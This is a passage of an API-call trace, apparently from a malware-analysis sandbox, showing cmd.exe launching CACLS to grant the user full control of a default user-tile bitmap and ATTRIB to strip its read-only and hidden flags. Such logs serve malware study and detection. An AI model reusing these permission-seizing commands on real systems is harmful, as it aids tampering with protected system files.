lpBuffer=0x1cf73c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0184.941] GetConsoleOutputCP () returned 0x1b5 [0184.941] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.941] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0184.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.941] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0184.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.942] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.942] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.942] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.942] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.942] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.942] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0184.942] GetEnvironmentStringsW () returned 0x2c0308* [0184.943] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.943] GetEnvironmentStringsW () returned 0x2c0308* [0184.943] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.943] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0xb8, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegCloseKey (hKey=0x40) returned 0x0 [0184.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.944] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.944] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.944] RegCloseKey (hKey=0x40) returned 0x0 [0184.944] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886393 [0184.944] srand (_Seed=0x5b886393) [0184.944] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" [0184.944] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" [0184.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.944] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0184.944] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.945] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.945] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.945] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0184.945] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0184.945] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0184.945] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0184.945] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0184.945] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0184.945] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0184.945] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0184.945] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0184.945] GetEnvironmentStringsW () returned 0x2c2458* [0184.945] FreeEnvironmentStringsW (penv=0x2c2458) returned 1 [0184.945] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.945] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.945] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0184.945] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0184.945] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0184.945] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0184.945] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0184.945] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0184.945] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0184.945] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0184.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf4a8, lpFilePart=0x1cf4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf4a4*="Desktop") returned 0x18 [0184.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.946] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x2c0ae8 [0184.946] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0184.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x2c0ae8 [0184.946] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0184.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x2c0ae8 [0184.946] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0184.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.946] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0184.946] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0184.947] GetEnvironmentStringsW () returned 0x2c0308* [0184.947] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.947] GetConsoleOutputCP () returned 0x1b5 [0184.947] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.947] GetUserDefaultLCID () returned 0x409 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="1") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0184.948] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0184.949] GetConsoleTitleW (in: lpConsoleTitle=0x2b09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.950] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.950] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0184.950] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0184.950] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0184.951] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0184.951] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0184.951] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0184.951] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0184.951] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0184.951] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0184.951] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0184.951] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0184.955] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0184.955] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0184.955] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0184.955] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0184.955] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0184.955] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0184.955] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0184.960] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.960] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.960] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.960] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.960] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.960] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.960] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.960] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.960] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.960] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.961] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.961] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.961] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.961] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.961] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.961] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.961] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.961] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.961] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.961] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.961] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.961] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.961] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.961] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.961] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.961] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.961] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.962] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.962] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.962] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.962] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.962] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.962] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.962] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.962] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.962] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.962] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.962] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.962] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.962] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.962] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.962] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.962] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.962] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.962] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.962] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.962] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.962] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.962] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.962] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.962] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.963] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0184.963] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0184.963] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0184.963] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0184.963] SetErrorMode (uMode=0x0) returned 0x0 [0184.963] SetErrorMode (uMode=0x1) returned 0x0 [0184.963] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2c1e98, lpFilePart=0x1ced9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ced9c*="Desktop") returned 0x18 [0184.963] SetErrorMode (uMode=0x0) returned 0x1 [0184.964] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.964] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.971] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0184.971] GetLastError () returned 0x2 [0184.971] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0184.971] GetLastError () returned 0x2 [0184.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2c2180 [0184.972] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0184.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0184.972] GetLastError () returned 0x2 [0184.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2c2180 [0184.972] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0184.972] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.972] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.972] GetConsoleTitleW (in: lpConsoleTitle=0x1cf010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.972] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cef60 | out: lpAttributeList=0x1cee98, lpSize=0x1cef60) returned 1 [0184.972] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cef58, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee98, lpPreviousValue=0x0) returned 1 [0184.972] GetStartupInfoW (in: lpStartupInfo=0x1cee54 | out: lpStartupInfo=0x1cee54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.972] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.974] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ceef4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cef40 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cef40*(hProcess=0x50, hThread=0x4c, dwProcessId=0x3dc, dwThreadId=0xe28)) returned 1 [0184.977] CloseHandle (hObject=0x4c) returned 1 [0184.977] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.977] GetEnvironmentStringsW () returned 0x2c0308* [0184.977] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.977] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.040] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cee34 | out: lpExitCode=0x1cee34*=0x0) returned 1 [0185.040] CloseHandle (hObject=0x50) returned 1 [0185.040] _vsnwprintf (in: _Buffer=0x1cef7c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cee40 | out: _Buffer="00000000") returned 8 [0185.040] 